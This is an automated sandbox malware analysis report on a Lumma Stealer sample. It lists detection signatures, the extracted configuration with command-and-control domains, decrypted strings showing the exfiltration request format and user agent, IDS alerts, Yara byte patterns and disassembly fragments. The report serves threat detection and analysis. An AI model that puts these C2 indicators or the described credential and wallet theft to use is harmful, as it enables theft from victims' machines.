Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Z19n7XRT1.exe

Overview

General Information

Sample name:5Z19n7XRT1.exe
renamed because original name is a hash value
Original sample name:fb4f1803fbfc70bc55b61bf418d52d3d.exe
Analysis ID:1581620
MD5:fb4f1803fbfc70bc55b61bf418d52d3d
SHA1:056d8ee3e8a88bec928c8cd56efe606400262ffb
SHA256:dcb4c992866efa672aa8b755cb1496eff39fc6c504c88eee5525c0a46bee1c9e
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5Z19n7XRT1.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\5Z19n7XRT1.exe" MD5: FB4F1803FBFC70BC55B61BF418D52D3D)
    • WerFault.exe (PID: 6212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["scentniej.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1750:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.5Z19n7XRT1.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.5Z19n7XRT1.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  0.3.5Z19n7XRT1.exe.24e0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:57.685554+010020283713Unknown Traffic192.168.2.64970823.55.153.106443TCP
                    2024-12-28T09:59:00.099091+010020283713Unknown Traffic192.168.2.649710104.21.66.86443TCP
                    2024-12-28T09:59:02.275276+010020283713Unknown Traffic192.168.2.649716104.21.66.86443TCP
                    2024-12-28T09:59:04.694621+010020283713Unknown Traffic192.168.2.649722104.21.66.86443TCP
                    2024-12-28T09:59:07.099147+010020283713Unknown Traffic192.168.2.649728104.21.66.86443TCP
                    2024-12-28T09:59:09.553637+010020283713Unknown Traffic192.168.2.649737172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:59:00.824979+010020546531A Network Trojan was detected192.168.2.649710104.21.66.86443TCP
                    2024-12-28T09:59:03.052008+010020546531A Network Trojan was detected192.168.2.649716104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:59:00.824979+010020498361A Network Trojan was detected192.168.2.649710104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:59:03.052008+010020498121A Network Trojan was detected192.168.2.649716104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.752380+010020585721Domain Observed Used for C2 Detected192.168.2.6595691.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:54.873140+010020585761Domain Observed Used for C2 Detected192.168.2.6639091.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.898293+010020585781Domain Observed Used for C2 Detected192.168.2.6615811.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.466978+010020585801Domain Observed Used for C2 Detected192.168.2.6543751.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.018066+010020585841Domain Observed Used for C2 Detected192.168.2.6561161.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.160830+010020585861Domain Observed Used for C2 Detected192.168.2.6545031.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.305197+010020585881Domain Observed Used for C2 Detected192.168.2.6649501.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:55.609799+010020585901Domain Observed Used for C2 Detected192.168.2.6541421.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:59:05.741502+010020480941Malware Command and Control Activity Detected192.168.2.649722104.21.66.86443TCP
                    2024-12-28T09:59:10.530843+010020480941Malware Command and Control Activity Detected192.168.2.649737172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T09:58:58.472225+010028586661Domain Observed Used for C2 Detected192.168.2.64970823.55.153.106443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://scentniej.buzz/IPAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/api1WuAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/KPAvira URL Cloud: Label: malware
                    Source: https://scentniej.buzz/Avira URL Cloud: Label: malware
                    Source: https://rebuildeso.buzz/Avira URL Cloud: Label: malware
                    Source: https://screwamusresz.buzz/api3Avira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/.co.jpAvira URL Cloud: Label: malware
                    Source: https://scentniej.buzz/apiAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz"], "Build id": "4h5VfH--"}
                    Multi AV Scanner detection for submitted file
                    Source: 5Z19n7XRT1.exeReversingLabs: Detection: 55%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for sample
                    Source: 5Z19n7XRT1.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                    Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00415298 CryptUnprotectData,0_2_00415298

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeUnpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack
                    Source: 5Z19n7XRT1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49737 version: TLS 1.2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_00415298
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415298
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0043CB20
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0043CD60
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, edx0_2_0040BDC9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0040CFF3
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0040CFF3
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp al, 2Eh0_2_00426054
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_00426054
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B068
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B068
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0040E83B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0040A940
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, ecx0_2_0040A940
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0040C917
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp ecx0_2_0043C1F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00425990
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, di0_2_00425990
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B195
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0043B9A1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_004369A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0041E9B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004299B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_0042526A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebx, edi0_2_0041D270
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov esi, eax0_2_00423A34
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0043D2F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0043D2F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp ecx0_2_0043C280
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0043AAB2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_004252BA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_004252BA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov eax, ebx0_2_0041CB05
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, eax0_2_00427326
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_004143C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]0_2_004143C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042A3D0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042C45C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00436C00
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4FC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042B4FC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_00418578
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, eax0_2_0042750D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_00421D10
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0040DD25
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_00417582
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00427DA2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_004205B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C64A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042AE48
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_00426E50
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042B4F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042AE24
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00433630
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C6E4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00425E90
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0043CE90
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004166A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041BEA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_0042ADF4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov eax, edx0_2_0041C6BB
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_0043BF40
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00415F66
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0043A777
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00409700
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00409700
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00409700
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C726
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C735
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041DF80
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0249D25A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0249D25A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_024CC268
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024CB2CF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024CB2CF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024CB2C4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024CB2C4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_024CB2C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024CB2C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_024CB3FC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp al, 2Eh0_2_024B63B6
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, edx0_2_0249C030
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_024B70E4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_024CD0F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_024B60F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BB08B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BB0AF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BB05B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_024AE1E7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_024BA637
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BC6C3
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_024BB763
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, eax0_2_024BB763
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp eax0_2_024B6739
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_024A87DF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_024A77E9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then jmp ecx0_2_024CC79B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov edx, eax0_2_024B7797
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_024B54D1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov ebx, edi0_2_024AD4D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_024A554C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_024A6544
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_024CD557
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_024CD557
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024AC528
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_024B552B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_024B559D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_024B55B3
